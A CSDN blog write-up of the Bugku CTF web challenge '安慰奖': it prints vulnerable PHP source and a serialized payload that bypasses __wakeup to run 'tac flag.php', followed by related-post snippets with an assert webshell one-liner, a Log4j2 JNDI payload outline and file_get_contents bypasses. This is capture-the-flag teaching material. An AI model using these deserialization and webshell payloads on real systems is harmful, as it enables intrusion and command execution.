Bugku WEB 安慰奖

最新推荐文章于 2022-11-15 16:17:36 发布
最新推荐文章于 2022-11-15 16:17:36 发布
阅读量270 收藏
点赞数
分类专栏: BUGKU 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/118874439
版权 
<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

代码分析,construct方法可以让外部来的username和cmd变量替代内部的protected的username和cmd
但是经过尝试,普通变量肯定不行,只好尝试权限比protected高的private变量
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行
destruct方法过滤了一堆命令
但是两个反引号明显是存在远程命令调用的
所以tac命令可以成功绕过,那么思路已经很清晰
序列化一个ctf对象,其中username,cmd必须是private变量,cmd命令用tac命令,用多于两个属性值的对象就可以禁用wakeup方法
构造payload:

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

O 代表对象 因为我们序列化的是一个对象
3 代表类名字占三个字符
ctf 类名
3 代表三个属性,因为需要绕过__wakeup()函数,所以比实际属性个数2大
s代表字符串
11代表属性名长度
username 属性名
s:5:“admin” 字符串 属性值长度 属性值

private属性被序列化的时候属性值会变成%00类名%00属性名,根据规则进行修改
参考视频链接:https://www.bilibili.com/video/BV1KK4y1u7DF/

显哥无敌
关注
专栏目录
BUGKU——安慰
doraemon12345的博客
06-08 247
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
bugku 安慰
濯君
12-31 1972
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
bugku web 安慰
m0_58189778的博客
08-19 364
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
bugku-web-安慰
m0_57954651的博客
11-15 869
唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们因为类名是ctf 所以构造为。exit('flag能让你这么容易拿到吗?get获取code的值传给select并把select的值反序列化后传给res。如果username的值为admin将cmd的值传给a变量并输出执行。打开 进行代码审计 是php序列化序列化的内容。存在一个flag.php文件 但是访问没有结果。此处是将username的值改为guest。点开链接 是空白页面。
Bugku_安慰
CaiNiaoLW的博客
02-27 677
打开页面,发现是空白的,查看源码,发现一段base64加密的密文, 解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $user
bugku web-安慰-考查反序列化和魔术方法
weixin_46578840的博客
09-04 344
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
Bugku Web 安慰
JJT
05-11 270
Bugku Web 安慰   进入场景一片空白,查看源码发现YmFja3Vwcw==用base64解码得到backups,所以需要查看备份文件,用御剑扫描网站页面,发现了index.php.bak,访问后得到了一段如下的代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $u
安慰剂检验stata代码和案例数据
12-26
安慰剂检验在统计学和经济学领域中是一种重要的分析方法,主要用于评估研究结果的稳健性和假设检验的有效性。在随机对照试验(RCT)中,安慰剂通常用于对照组,以确保观察到的效果是由于实验处理而非其他因素。在...
基于java的抽系统
02-16
例如,添加“幸运”、“安慰”等特殊项,以提高参与者的参与度和满意度。 动态抽效果是这个系统的一大亮点。它通过丰富的视觉展示,如旋转的抽盘、闪烁的灯光或者滚动的字列表,来增强现场的氛围。这些...
Web后端基础知识
qq_44716275的博客
04-07 4410
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings
Bugku安慰
qq_46230755的博客
01-30 428
打开来查看源代码发现提示 YmFja3Vwcw== base64解码后得到:backups 扫描一下网站 在index.php.bak找到备份文件 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd
Bugku CTF 每日一题 安慰
彼岸花苏陌的博客
01-19 707
安慰 打开网页啥都没有 习惯性按f12发现一段base64,解码后发现是 YmFja3Vwcw== backups(备份) 于是想到了网站备份,但是备份目录忘了 于是用dirsearch扫了一下 发现是index.php.bak 于是下载源码发现是代码审计 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class
Bugku:Simple_SSTI_1
qq_46230755的博客
03-01 8445
很简单的模板注入,直接F12查看提示 flag在secret_key下。 bugku才是对萌新最友好的平台!!!!
三十七、bugku安慰
山兔的博客
09-05 170
打开网页,一片空白,查看源码,发现YmFja3Vwcw==,base64解码得到backups。 用御剑土司没跑出来,御剑1.5跑出来了/flag.php,/index.php.bak。 下载文件,得到了源码,发现是考序列化和反序列化。 百度搜索相关知识, _wakeup()当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过_wakeup()的执行。 序列化就是将对象转换成字符串。字符串包括属性属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的
Bugku WEB shell
qq_41696858的博客
07-03 2161
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
Bugku WEB Apache Log4j2 RCE
qq_41696858的博客
12-13 2025
bugku最近上新了一题log4j2的题,紧跟时代,刷一刷 先简单说一下这个漏洞的原理吧,本质是JNDI注入 需要说的是,这题需要弹VPS,也就是你得有公网IP 通过构造形如${jndi:ldap:}或者${jndi:rmi}之类的恶意payload,可以造成任意命令执行漏洞 防护的常用思路:更新apache2 log4j2版本到2.15以上 一般来说可能造成此漏洞的API包括但不限于logger.info(),logger.error() 具体的调用链可以看这篇https://www.anquanke.c
Bugku WEB file_get_contents
qq_41696858的博客
07-17 1412
file_get_contents绕过: 解法1:?ac=bugku&fn=flag.txt 由于flag.txt里面内容就是bugku,当然可以绕过,当然,这属于投机取巧,不具有一般性 解法2:?ac=bugku&fn=php://input 在burp抓到数据包里的数据部分写上bugku,利用php://input伪协议进行绕过 解法3:?ac=bugku&fn=data://text/plain,bugku 利用data://text/plain伪协议进行绕过 data伪协议只
Bugku WEB sodirty
qq_41696858的博客
07-10 1147
其实还是源码分析 dirsearch扫路径,发现有www备份,下载下来肯定是源码分析 文件有点多 more ./*|grep flag一个一个文件夹找,在router目录下找到index.js找到flag相关代码,后来查阅资料发现node.js里面router是根据路由去分模块 就相当java里的spring mvc直接跟用户交互用来寻找功能函数的框架 查看源码: var express = require('express'); const setFn = require('set-value'); va
Bugku Crypto EN-气泡
qq_41696858的博客
08-07 818
今天攻防世界场景好像出问题了,做两道bugku的密码题吧 第一题考的是气泡密码 气泡密码的原理看这篇:https://blog.csdn.net/qq_43428547/article/details/106819278 基本识别:x开头,x结尾,某些特定位是元音字母,而且出现频率特别高,而且基本单元是5元组 在线工具 http://ctf.ssleye.com/bubble.html 我也看别人说了,这东西时灵时不灵,还是自己写脚本靠谱 python自带包from bubblepy import Bubb
安慰奶牛 python
最新发布
06-14
"安慰奶牛"这个说法通常指的是在 Python 中使用某种方法或技巧来缓解代码中的某些问题,就像对焦虑的奶牛给予安抚一样。这可能涉及到调试、错误处理或者是编写简洁易懂的代码来提高代码的可读性和维护性。 在 Python 中,一些常见的"安慰奶牛"技术包括: 1. **异常处理(Exception Handling)**:使用 try/except 块捕获和处理可能出现的错误,避免程序因为单个错误就终止。 2. **代码注释和文档**:清晰的注释可以帮助他人理解你的代码意图,使得代码更易于阅读和维护。 3. **模块化和函数封装**:将功能分解为独立的模块或函数,减少全局变量和复杂逻辑,提高代码复用和模块的稳定性。 4. **单元测试(Unit Testing)**:为代码编写测试用例,确保每个部分都能正常工作,增强代码的可靠性。 5. **代码审查(Code Review)**:让同事或社区成员检查你的代码,他们可能会发现一些潜在的问题或优化建议。 6. **Python PEP 8 风格指南**:遵循 Python 的官方编码风格,使代码风格一致,提高代码的可读性。 如果你有具体的关于 Python 编程中如何实施这些策略的问题,或者遇到某个特定问题需要解决,欢迎提问,我会帮你详细解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值